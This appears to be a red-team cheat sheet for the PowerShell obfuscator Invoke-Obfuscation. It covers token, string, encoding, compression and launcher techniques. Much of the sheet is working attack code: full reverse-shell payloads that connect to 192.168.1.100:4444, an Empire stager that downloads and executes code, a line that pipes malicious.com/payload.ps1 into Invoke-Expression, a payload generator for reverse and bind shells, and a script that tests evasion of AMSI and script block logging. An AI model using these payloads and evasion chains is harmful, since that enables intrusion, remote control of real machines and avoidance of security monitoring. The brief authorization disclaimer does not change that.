コンテンツにスキップ

Invoke-Obfuscation Cheat Sheet

Overview

Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator. It was designed to assist red teamers and penetration testers in bypassing antivirus, application whitelisting, and other defensive measures by obfuscating PowerShell scripts and commands. The tool provides multiple obfuscation techniques including token-based obfuscation, string obfuscation, encoding, and compression.

⚠️ Warning: Only use Invoke-Obfuscation in environments you own or have explicit permission to test. Unauthorized use may violate terms of service or local laws. This tool is intended for legitimate security testing purposes only.

Installation

# Install from PowerShell Gallery (recommended)
Install-Module -Name Invoke-Obfuscation -Force

# Import the module
Import-Module Invoke-Obfuscation

# Verify installation
Get-Command -Module Invoke-Obfuscation

Manual Installation

# Download from GitHub
Invoke-WebRequest -Uri "https://github.com/danielbohannon/Invoke-Obfuscation/archive/master.zip" -OutFile "Invoke-Obfuscation.zip"

# Extract the archive
Expand-Archive -Path "Invoke-Obfuscation.zip" -DestinationPath "C:\Tools\"

# Import the module
Import-Module "C:\Tools\Invoke-Obfuscation-master\Invoke-Obfuscation.psd1"

# Or add to PowerShell profile for persistent loading
$ProfilePath = $PROFILE.AllUsersAllHosts
if (!(Test-Path $ProfilePath)) \\\\{ New-Item -Path $ProfilePath -ItemType File -Force \\\\}
Add-Content -Path $ProfilePath -Value "Import-Module C:\Tools\Invoke-Obfuscation-master\Invoke-Obfuscation.psd1"

Git Installation

# Clone the repository
git clone https://github.com/danielbohannon/Invoke-Obfuscation.git
cd Invoke-Obfuscation

# Import in PowerShell
powershell -Command "Import-Module .\Invoke-Obfuscation.psd1"

Kali Linux Installation

# Install PowerShell on Kali Linux
sudo apt update
sudo apt install -y powershell

# Start PowerShell
pwsh

# Install Invoke-Obfuscation
Install-Module -Name Invoke-Obfuscation -Force
Import-Module Invoke-Obfuscation

Basic Usage

Interactive Mode

# Start interactive obfuscation session
Invoke-Obfuscation

# Set script to obfuscate
SET SCRIPTPATH C:\Scripts\payload.ps1

# Set script block to obfuscate
SET SCRIPTBLOCK \\\\{Get-Process; Get-Service\\\\}

# Show current settings
SHOW OPTIONS

# Show available obfuscation types
SHOW

# Get help
HELP

Command Line Mode

# Obfuscate a script file
Invoke-Obfuscation -ScriptPath "C:\Scripts\payload.ps1" -Command "TOKEN\ALL\1" -Quiet

# Obfuscate a script block
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "STRING\1" -Quiet

# Obfuscate with multiple techniques
Invoke-Obfuscation -ScriptPath "C:\Scripts\payload.ps1" -Command "TOKEN\ALL\1,ENCODING\1" -Quiet

# Save obfuscated output to file
Invoke-Obfuscation -ScriptPath "C:\Scripts\payload.ps1" -Command "TOKEN\ALL\1" -Quiet|Out-File "C:\Scripts\obfuscated.ps1"

Obfuscation Techniques

Token Obfuscation

# Obfuscate all tokens with random case
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "TOKEN\ALL\1" -Quiet

# Obfuscate specific token types
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "TOKEN\COMMAND\1" -Quiet
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "TOKEN\COMMANDARGUMENT\1" -Quiet
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "TOKEN\MEMBER\1" -Quiet
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "TOKEN\VARIABLE\1" -Quiet

# Advanced token obfuscation
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "TOKEN\ALL\2" -Quiet
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "TOKEN\ALL\3" -Quiet

String Obfuscation

# Concatenate strings
Invoke-Obfuscation -ScriptBlock \\\\{'Hello World'\\\\} -Command "STRING\1" -Quiet

# Reorder strings
Invoke-Obfuscation -ScriptBlock \\\\{'Hello World'\\\\} -Command "STRING\2" -Quiet

# Reverse strings
Invoke-Obfuscation -ScriptBlock \\\\{'Hello World'\\\\} -Command "STRING\3" -Quiet

# Advanced string obfuscation
$script = \\\\{
    $message = "This is a test message"
    Write-Host $message
\\\\}
Invoke-Obfuscation -ScriptBlock $script -Command "STRING\1" -Quiet

Encoding Obfuscation

# ASCII encoding
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "ENCODING\1" -Quiet

# Hex encoding
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "ENCODING\2" -Quiet

# Octal encoding
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "ENCODING\3" -Quiet

# Binary encoding
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "ENCODING\4" -Quiet

# SecureString encoding
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "ENCODING\5" -Quiet

# BXOR encoding
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "ENCODING\6" -Quiet

# Special character encoding
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "ENCODING\7" -Quiet

# Whitespace encoding
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "ENCODING\8" -Quiet

Compression Obfuscation

# GZip compression
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process; Get-Service; Get-EventLog -LogName System -Newest 10\\\\} -Command "COMPRESS\1" -Quiet

# Deflate compression
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process; Get-Service; Get-EventLog -LogName System -Newest 10\\\\} -Command "COMPRESS\2" -Quiet

Launcher Obfuscation

# PowerShell launcher
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "LAUNCHER\PS\1" -Quiet

# CMD launcher
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "LAUNCHER\CMD\1" -Quiet

# WMIC launcher
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "LAUNCHER\WMIC\1" -Quiet

# Rundll32 launcher
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "LAUNCHER\RUNDLL32\1" -Quiet

# VAR+ launcher (advanced)
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "LAUNCHER\VAR+\1" -Quiet

# STDIN+ launcher
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "LAUNCHER\STDIN+\1" -Quiet

# CLIP+ launcher
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "LAUNCHER\CLIP+\1" -Quiet

Advanced Obfuscation

Multi-Layer Obfuscation

# Apply multiple obfuscation techniques
$script = \\\\{
    $processes = Get-Process
    $services = Get-Service
    Write-Host "Found $($processes.Count) processes and $($services.Count) services"
\\\\}

# Layer 1: Token obfuscation
$obfuscated1 = Invoke-Obfuscation -ScriptBlock $script -Command "TOKEN\ALL\1" -Quiet

# Layer 2: String obfuscation
$obfuscated2 = Invoke-Obfuscation -ScriptBlock ([ScriptBlock]::Create($obfuscated1)) -Command "STRING\1" -Quiet

# Layer 3: Encoding
$obfuscated3 = Invoke-Obfuscation -ScriptBlock ([ScriptBlock]::Create($obfuscated2)) -Command "ENCODING\1" -Quiet

# Layer 4: Compression
$final = Invoke-Obfuscation -ScriptBlock ([ScriptBlock]::Create($obfuscated3)) -Command "COMPRESS\1" -Quiet

Write-Host $final

Custom Obfuscation Chains

# Define obfuscation chain
$obfuscationChain = @(
    "TOKEN\ALL\1",
    "STRING\2",
    "ENCODING\3",
    "LAUNCHER\PS\1"
)

# Apply chain to script
$script = \\\\{
    Invoke-WebRequest -Uri "http://malicious.com/payload.ps1"|Invoke-Expression
\\\\}

$result = $script
foreach ($command in $obfuscationChain) \\\\{
    $result = Invoke-Obfuscation -ScriptBlock ([ScriptBlock]::Create($result)) -Command $command -Quiet
\\\\}

Write-Host $result

Payload-Specific Obfuscation

# Obfuscate Meterpreter payload
$meterpreterPayload = \\\\{
    $client = New-Object System.Net.Sockets.TCPClient("192.168.1.100",4444)
    $stream = $client.GetStream()
    [byte[]]$bytes = 0..65535|%\\\\{0\\\\}
    while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) \\\\{
        $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
        $sendback = (iex $data 2>&1|Out-String )
        $sendback2 = $sendback + "PS " + (pwd).Path + "> "
        $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
        $stream.Write($sendbyte,0,$sendbyte.Length)
        $stream.Flush()
    \\\\}
    $client.Close()
\\\\}

$obfuscatedMeterpreter = Invoke-Obfuscation -ScriptBlock $meterpreterPayload -Command "TOKEN\ALL\1,STRING\1,ENCODING\1" -Quiet

Empire/Covenant Payload Obfuscation

# Obfuscate Empire stager
$empireStager = \\\\{
    $wc=New-Object System.Net.WebClient
    $u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'
    $wc.Headers.Add('User-Agent',$u)
    $wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy
    $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
    $Script:Proxy = $wc.Proxy
    $K=[System.Text.Encoding]::ASCII.GetBytes('staging_key_here')
    $R=\\\\{$D,$K=$Args;$S=0..255;0..255|%\\\\{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]\\\\};$D|%\\\\{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]\\\\}\\\\}
    $ser='http://192.168.1.100:80'
    $t='/admin/get.php'
    $wc.Headers.Add("Cookie","session=value")
    $data=$wc.DownloadData($ser+$t)
    $iv=$data[0..3];$data=$data[4..$data.length]
    -join[Char[]](& $R $data ($IV+$K))|IEX
\\\\}

$obfuscatedEmpire = Invoke-Obfuscation -ScriptBlock $empireStager -Command "TOKEN\ALL\2,STRING\2,ENCODING\2,LAUNCHER\PS\1" -Quiet

Automation Scripts

Batch Obfuscation Script

# Batch obfuscation script
param(
    [Parameter(Mandatory=$true)]
    [string]$InputDirectory,

    [Parameter(Mandatory=$true)]
    [string]$OutputDirectory,

    [string[]]$ObfuscationCommands = @("TOKEN\ALL\1", "STRING\1", "ENCODING\1")
)

# Create output directory if it doesn't exist
if (!(Test-Path $OutputDirectory)) \\\\{
    New-Item -ItemType Directory -Path $OutputDirectory -Force
\\\\}

# Get all PowerShell files
$psFiles = Get-ChildItem -Path $InputDirectory -Filter "*.ps1" -Recurse

foreach ($file in $psFiles) \\\\{
    Write-Host "[+] Processing: $($file.Name)"

    try \\\\{
        # Read the script content
        $scriptContent = Get-Content -Path $file.FullName -Raw
        $scriptBlock = [ScriptBlock]::Create($scriptContent)

        # Apply obfuscation
        $obfuscated = $scriptContent
        foreach ($command in $ObfuscationCommands) \\\\{
            Write-Host "  Applying: $command"
            $obfuscated = Invoke-Obfuscation -ScriptBlock ([ScriptBlock]::Create($obfuscated)) -Command $command -Quiet
        \\\\}

        # Save obfuscated script
        $outputPath = Join-Path $OutputDirectory "$($file.BaseName)_obfuscated.ps1"
        $obfuscated|Out-File -FilePath $outputPath -Encoding UTF8

        Write-Host "  ✓ Saved: $outputPath"

    \\\\} catch \\\\{
        Write-Host "  ✗ Error: $($_.Exception.Message)" -ForegroundColor Red
    \\\\}
\\\\}

Write-Host "[+] Batch obfuscation completed"

Payload Generator Script

# Advanced payload generator with obfuscation
param(
    [Parameter(Mandatory=$true)]
    [string]$LHOST,

    [Parameter(Mandatory=$true)]
    [int]$LPORT,

    [string]$PayloadType = "reverse_tcp",
    [string]$OutputPath = ".\obfuscated_payload.ps1",
    [string[]]$ObfuscationLevels = @("TOKEN\ALL\1", "STRING\1", "ENCODING\1")
)

# Define payload templates
$payloadTemplates = @\\\\{
    "reverse_tcp" = @"
`$client = New-Object System.Net.Sockets.TCPClient('$LHOST',$LPORT)
`$stream = `$client.GetStream()
[byte[]]`$bytes = 0..65535|%\\\\{0\\\\}
while((`$i = `$stream.Read(`$bytes, 0, `$bytes.Length)) -ne 0) \\\\{
    `$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(`$bytes,0, `$i)
    `$sendback = (iex `$data 2>&1|Out-String)
    `$sendback2 = `$sendback + 'PS ' + (pwd).Path + '> '
    `$sendbyte = ([text.encoding]::ASCII).GetBytes(`$sendback2)
    `$stream.Write(`$sendbyte,0,`$sendbyte.Length)
    `$stream.Flush()
\\}
`$client.Close()
"@

    "reverse_http" = @"
`$wc = New-Object System.Net.WebClient
`$wc.Headers.Add('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36')
while(`$true) \\{
    try \\{
        `$command = `$wc.DownloadString('http://$LHOST`:$LPORT/command')
        if (`$command) \\{
            `$result = iex `$command 2>&1|Out-String
            `$wc.UploadString('http://$LHOST`:$LPORT/result', `$result)
        \\\\}
        Start-Sleep -Seconds 5
    \\\\} catch \\\\{
        Start-Sleep -Seconds 10
    \\\\}
\\\\}
"@

    "bind_tcp" = @"
`$listener = [System.Net.Sockets.TcpListener]$LPORT
`$listener.Start()
`$client = `$listener.AcceptTcpClient()
`$stream = `$client.GetStream()
[byte[]]`$bytes = 0..65535|%\\{0\\}
while((`$i = `$stream.Read(`$bytes, 0, `$bytes.Length)) -ne 0) \\{
    `$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(`$bytes,0, `$i)
    `$sendback = (iex `$data 2>&1|Out-String)
    `$sendback2 = `$sendback + 'PS ' + (pwd).Path + '> '
    `$sendbyte = ([text.encoding]::ASCII).GetBytes(`$sendback2)
    `$stream.Write(`$sendbyte,0,`$sendbyte.Length)
    `$stream.Flush()
\\\\}
`$client.Close()
`$listener.Stop()
"@
\\\\}

# Generate base payload
if ($payloadTemplates.ContainsKey($PayloadType)) \\\\{
    $basePayload = $payloadTemplates[$PayloadType]
    Write-Host "[+] Generated $PayloadType payload for $LHOST`:$LPORT"
\\} else \\{
    Write-Host "[-] Unknown payload type: $PayloadType" -ForegroundColor Red
    return
\\}

# Apply obfuscation
$obfuscatedPayload = $basePayload
foreach ($level in $ObfuscationLevels) \\{
    Write-Host "[+] Applying obfuscation: $level"
    $obfuscatedPayload = Invoke-Obfuscation -ScriptBlock ([ScriptBlock]::Create($obfuscatedPayload)) -Command $level -Quiet
\\}

# Save to file
$obfuscatedPayload|Out-File -FilePath $OutputPath -Encoding UTF8
Write-Host "[+] Obfuscated payload saved to: $OutputPath"

# Generate launcher commands
Write-Host "`n[+] Launcher commands:"
Write-Host "PowerShell: powershell.exe -ExecutionPolicy Bypass -File `"$OutputPath`""
Write-Host "Encoded: powershell.exe -EncodedCommand $([Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($obfuscatedPayload)))"

# Generate one-liner
$oneLiner = $obfuscatedPayload -replace "`r`n", "; " -replace "`n", "; "
Write-Host "`n[+] One-liner:"
Write-Host "powershell.exe -Command `"$oneLiner`""

Evasion Testing Script

# Test obfuscated payloads against AMSI and other defenses
param(
    [Parameter(Mandatory=$true)]
    [string]$PayloadPath,

    [switch]$TestAMSI,
    [switch]$TestExecutionPolicy,
    [switch]$TestScriptBlockLogging,
    [switch]$All
)

if ($All) \\\\{
    $TestAMSI = $true
    $TestExecutionPolicy = $true
    $TestScriptBlockLogging = $true
\\\\}

Write-Host "[+] Testing payload: $PayloadPath"

# Read payload
$payload = Get-Content -Path $PayloadPath -Raw

# Test AMSI
if ($TestAMSI) \\\\{
    Write-Host "`n[+] Testing AMSI detection..."

    try \\{
        # Check if AMSI detects the payload
        $amsiContext = [System.IntPtr]::Zero
        $amsiSession = [System.IntPtr]::Zero

        # This is a simplified test - in reality, AMSI testing is more complex
        $result = [System.Management.Automation.AmsiUtils]::ScanContent($payload, "test")

        if ($result -eq "Clean") \\{
            Write-Host "  ✓ AMSI: Clean" -ForegroundColor Green
        \\} else \\{
            Write-Host "  ✗ AMSI: Detected" -ForegroundColor Red
        \\}
    \\} catch \\{
        Write-Host "  ? AMSI: Unable to test" -ForegroundColor Yellow
    \\}
\\}

# Test Execution Policy
if ($TestExecutionPolicy) \\{
    Write-Host "`n[+] Testing Execution Policy bypass..."

    $currentPolicy = Get-ExecutionPolicy
    Write-Host "  Current policy: $currentPolicy"

    if ($currentPolicy -eq "Restricted" -or $currentPolicy -eq "AllSigned") \\\\{
        Write-Host "  ⚠ Restrictive policy detected" -ForegroundColor Yellow
        Write-Host "  Bypass methods:"
        Write-Host "    powershell.exe -ExecutionPolicy Bypass -File `"$PayloadPath`""
        Write-Host "    powershell.exe -Command `"Set-ExecutionPolicy Bypass -Scope Process; & '$PayloadPath'`""
    \\\\} else \\\\{
        Write-Host "  ✓ Policy allows execution" -ForegroundColor Green
    \\\\}
\\\\}

# Test Script Block Logging
if ($TestScriptBlockLogging) \\\\{
    Write-Host "`n[+] Testing Script Block Logging evasion..."

    $logPolicy = Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -ErrorAction SilentlyContinue

    if ($logPolicy -and $logPolicy.EnableScriptBlockLogging -eq 1) \\{
        Write-Host "  ⚠ Script Block Logging is enabled" -ForegroundColor Yellow
        Write-Host "  Consider additional obfuscation or AMSI bypass"
    \\} else \\{
        Write-Host "  ✓ Script Block Logging not detected" -ForegroundColor Green
    \\}
\\}

# Test payload execution (dry run)
Write-Host "`n[+] Testing payload syntax..."
try \\\\{
    $scriptBlock = [ScriptBlock]::Create($payload)
    Write-Host "  ✓ Syntax is valid" -ForegroundColor Green
\\\\} catch \\\\{
    Write-Host "  ✗ Syntax error: $($_.Exception.Message)" -ForegroundColor Red
\\\\}

Write-Host "`n[+] Testing completed"

Integration with Attack Frameworks

Metasploit Integration

# Generate obfuscated Metasploit payload
$msfPayload = @"
`$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100',4444)
`$stream = `$client.GetStream()
[byte[]]`$bytes = 0..65535|%\\{0\\}
while((`$i = `$stream.Read(`$bytes, 0, `$bytes.Length)) -ne 0) \\{
    `$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(`$bytes,0, `$i)
    `$sendback = (iex `$data 2>&1|Out-String)
    `$sendback2 = `$sendback + 'PS ' + (pwd).Path + '> '
    `$sendbyte = ([text.encoding]::ASCII).GetBytes(`$sendback2)
    `$stream.Write(`$sendbyte,0,`$sendbyte.Length)
    `$stream.Flush()
\\\\}
`$client.Close()
"@

# Obfuscate for Metasploit
$obfuscatedMSF = Invoke-Obfuscation -ScriptBlock ([ScriptBlock]::Create($msfPayload)) -Command "TOKEN\ALL\1,STRING\1,ENCODING\1,LAUNCHER\PS\1" -Quiet

# Save for use with Metasploit
$obfuscatedMSF|Out-File -FilePath "msf_payload_obfuscated.ps1"

Empire Integration

# Obfuscate Empire stager
$empireStager = \\{
    # Empire stager code here
    $wc=New-Object System.Net.WebClient
    $u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'
    $wc.Headers.Add('User-Agent',$u)
    # ... rest of Empire stager
\\}

# Apply heavy obfuscation for Empire
$obfuscatedEmpire = Invoke-Obfuscation -ScriptBlock $empireStager -Command "TOKEN\ALL\2,STRING\2,ENCODING\2,COMPRESS\1,LAUNCHER\VAR+\1" -Quiet

Covenant Integration

# Obfuscate Covenant Grunt
$covenantGrunt = \\{
    # Covenant Grunt code here
    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = \\{$true\\}
    $wc = New-Object System.Net.WebClient
    # ... rest of Covenant Grunt
\\}

# Apply obfuscation for Covenant
$obfuscatedCovenant = Invoke-Obfuscation -ScriptBlock $covenantGrunt -Command "TOKEN\ALL\1,STRING\1,ENCODING\3,LAUNCHER\RUNDLL32\1" -Quiet

Troubleshooting

Common Issues

Module Import Problems

# Fix module import issues
Import-Module Invoke-Obfuscation -Force

# Check module location
Get-Module -ListAvailable|Where-Object \\{$_.Name -like "*Obfuscation*"\\}

# Manual import
Import-Module "C:\Path\To\Invoke-Obfuscation.psd1"

# Check PowerShell execution policy
Get-ExecutionPolicy
Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser

Obfuscation Errors

# Debug obfuscation issues
$ErrorActionPreference = "Stop"
try \\{
    $result = Invoke-Obfuscation -ScriptBlock \\{Get-Process\\} -Command "TOKEN\ALL\1" -Quiet
\\} catch \\{
    Write-Host "Error: $($_.Exception.Message)"
    Write-Host "Stack Trace: $($_.ScriptStackTrace)"
\\}

# Test with simpler commands
Invoke-Obfuscation -ScriptBlock \\{Write-Host "Test"\\} -Command "STRING\1" -Quiet

# Check PowerShell version compatibility
$PSVersionTable.PSVersion

Performance Issues

# Optimize for large scripts
$script = Get-Content -Path "large_script.ps1" -Raw

# Use simpler obfuscation for large scripts
$obfuscated = Invoke-Obfuscation -ScriptBlock ([ScriptBlock]::Create($script)) -Command "TOKEN\COMMAND\1" -Quiet

# Process in chunks for very large scripts
$lines = Get-Content -Path "large_script.ps1"
$chunkSize = 100
for ($i = 0; $i -lt $lines.Count; $i += $chunkSize) \\{
    $chunk = $lines[$i..($i + $chunkSize - 1)] -join "`n"
    # Process chunk
\\\\}

Debugging and Testing

# Test obfuscated script execution
$obfuscated = Invoke-Obfuscation -ScriptBlock \\\\{Get-Date\\\\} -Command "TOKEN\ALL\1" -Quiet

# Execute obfuscated script
Invoke-Expression $obfuscated

# Compare original vs obfuscated output
$original = Get-Date
$obfuscatedResult = Invoke-Expression $obfuscated
Compare-Object $original $obfuscatedResult

# Validate script syntax
$scriptBlock = [ScriptBlock]::Create($obfuscated)
$scriptBlock.CheckRestrictedLanguage($false)

Resources

This cheat sheet provides a comprehensive reference for using Invoke-Obfuscation for PowerShell script and command obfuscation. Always ensure you have proper authorization before using this tool in any environment.